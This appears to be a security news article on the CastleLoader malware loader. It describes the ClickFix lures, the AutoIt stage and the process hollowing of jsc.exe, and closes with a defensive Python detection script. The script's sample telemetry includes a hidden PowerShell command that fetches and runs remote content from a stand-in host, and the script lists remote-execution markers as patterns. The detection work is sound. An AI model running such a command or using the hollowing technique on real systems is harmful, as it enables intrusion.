Wednesday, June 24, 2026

CastleLoader Malware To Attack US Government Agencies and Critical Infra

A dangerous malware loader dubbed CastleLoader poses a serious risk to US government agencies and critical infrastructure. First detected in early 2025, it has been used to gain initial access in coordinated attacks on federal agencies, IT firms, logistics companies, and essential infrastructure in North America and Europe.

Security researchers noted that one CastleLoader campaign affected around 460 different organizations.

CastleLoader is typically delivered through social engineering, using ClickFix-style lures: fake software update prompts or "system verification" alerts that instruct the victim to copy a command and run it. Victims who follow the instructions execute the attacker's command themselves, and that command launches CastleLoader.

Launch of a CastleLoader sample, showing the suspicious processes and network activity detected (Source: Any.Run)

Any.Run analysts found that the loader is built specifically to evade modern security tooling. CastleLoader is not a single straightforward executable: it is staged so that each step looks harmless on its own, and the malicious work is spread across several legitimate-looking processes.

Because no single process does anything obviously malicious, the infection is hard to spot from process telemetry alone; the chain has to be read as a whole.

The malware is delivered as an Inno Setup installer that bundles the legitimate AutoIt interpreter, AutoIt3.exe, together with a compiled AutoIt script named freely.a3x.

CastleLoader installer (Source: Any.Run)

The AutoIt script starts the next stage by launching jsc.exe, the legitimate JScript.NET compiler that ships with the .NET Framework, with the CREATE_SUSPENDED flag so that the new process is paused before its first instruction runs.

Rather than letting the suspended jsc.exe resume and run the real compiler, the malware performs process hollowing: it replaces the original image in the suspended process's memory with a complete PE executable of its own and then resumes the main thread, so the payload runs under the name and path of a legitimate Microsoft binary.
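The chain described above (ClickFix lure, Inno Setup installer dropping AutoIt3.exe, AutoIt launching a suspended jsc.exe, payload running inside the hollowed compiler) maps to a handful of process-telemetry checks. The following is an added example in Python, not Any.Run's analysis code and not anything from the CastleLoader report: it runs four rules over constructed Sysmon-style events (EventID 1 = ProcessCreate, EventID 3 = NetworkConnect) and then links flagged parent and child processes into one chain. The paths, PIDs, the example.invalid URL and the 203.0.113.7 address are made up; the field names follow Sysmon's schema.

```python
"""Process-telemetry checks for the CastleLoader chain described above.

Added example, not code from Any.Run or from the malware: four rules over
constructed Sysmon-style events (EventID 1 = ProcessCreate, EventID 3 =
NetworkConnect). Paths, PIDs, the URL and the IP address are made up.
"""

# Constructed sample telemetry: a ClickFix lure, the installer dropping
# AutoIt3.exe, AutoIt launching jsc.exe, jsc.exe beaconing out, and one benign
# developer build with jsc.exe that must not be flagged.
EVENTS = [
    {"EventID": 1, "ProcessId": 4010,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/verify | iex"'},
    {"EventID": 1, "ProcessId": 4020,
     "Image": r"C:\Users\u\AppData\Local\Temp\is-ABCD.tmp\setup.tmp",
     "ParentImage": r"C:\Users\u\Downloads\update.exe",
     "CommandLine": r"setup.tmp /SL5=$1,2,3,C:\Users\u\Downloads\update.exe"},
    {"EventID": 1, "ProcessId": 4030,
     "Image": r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\is-ABCD.tmp\setup.tmp",
     "CommandLine": "AutoIt3.exe freely.a3x"},
    {"EventID": 1, "ProcessId": 4040,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
     "CommandLine": "jsc.exe"},
    {"EventID": 3, "ProcessId": 4040,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 5000,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "jsc.exe /target:exe /out:app.exe app.js"},
]

# Interpreters a ClickFix lure typically has the victim paste a command into.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Substrings indicating the pasted command fetches and runs remote content.
REMOTE_EXEC_MARKERS = ("irm ", "iwr ", "downloadstring", "-enc", "mshta http")
# Parents under which a genuine JScript.NET compile is plausible.
BUILD_PARENTS = {"cmd.exe", "powershell.exe", "msbuild.exe", "devenv.exe"}
# Arguments a genuine jsc.exe invocation carries; a hollowing host has none.
COMPILE_ARGS = ("/target", "/out", ".js")


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, ProcessId) findings for the chain's observable steps.

    CREATE_SUSPENDED is not recorded by ProcessCreate events, so hollowing is
    inferred from who launched jsc.exe, what arguments it got, and whether the
    'compiler' later talks to the network.
    """
    findings = []
    for e in events:
        if e["EventID"] == 1:
            img = basename(e["Image"])
            parent = basename(e["ParentImage"])
            cmd = e["CommandLine"].lower()
            # Rule 1: ClickFix - a script host started from explorer.exe (Run
            # dialog / pasted command) that pulls and executes remote content.
            if (img in SCRIPT_HOSTS and parent == "explorer.exe"
                    and any(m in cmd for m in REMOTE_EXEC_MARKERS)):
                findings.append(("clickfix_run_dialog", e["ProcessId"]))
            # Rule 2: the AutoIt interpreter running a compiled .a3x script
            # out of a temp directory, as dropped by the Inno Setup installer.
            if (img == "autoit3.exe" and ".a3x" in cmd
                    and "\\temp\\" in e["Image"].lower()):
                findings.append(("autoit_from_installer_temp", e["ProcessId"]))
            # Rule 3: jsc.exe spawned by something that is not a build tool and
            # given nothing to compile: the signature of a hollowing host.
            if (img == "jsc.exe" and parent not in BUILD_PARENTS
                    and not any(a in cmd for a in COMPILE_ARGS)):
                findings.append(("jsc_no_compile_args", e["ProcessId"]))
        elif e["EventID"] == 3 and basename(e["Image"]) == "jsc.exe":
            # Rule 4: a compiler has no business making outbound connections.
            findings.append(("jsc_network", e["ProcessId"]))
    return findings


def chain_pids(events, findings):
    """Pair flagged processes whose parent is itself flagged, so the
    AutoIt -> jsc.exe steps surface as one incident rather than two alerts."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    flagged = {pid for _, pid in findings}
    linked = set()
    for pid in flagged:
        parent_img = by_pid[pid]["ParentImage"]
        for ppid, pe in by_pid.items():
            if ppid in flagged and pe["Image"] == parent_img:
                linked.add((ppid, pid))
    return sorted(linked)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:28} pid={pid}")
    print("parent->child chains:", chain_pids(EVENTS, detect(EVENTS)))
```

On the constructed events this flags the pasted PowerShell command (pid 4010), the AutoIt run (4030) and jsc.exe twice (4040, once for the argument-less launch and once for the outbound connection), leaves the developer's real compile (5000) alone, and links 4030 to 4040 as one chain. Rules 1 and 2 are the ones most likely to need tuning per environment; rule 3 paired with rule 4 is the strongest signal, because a compiler that was handed nothing to compile and then opens a network socket has almost no benign explanation.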
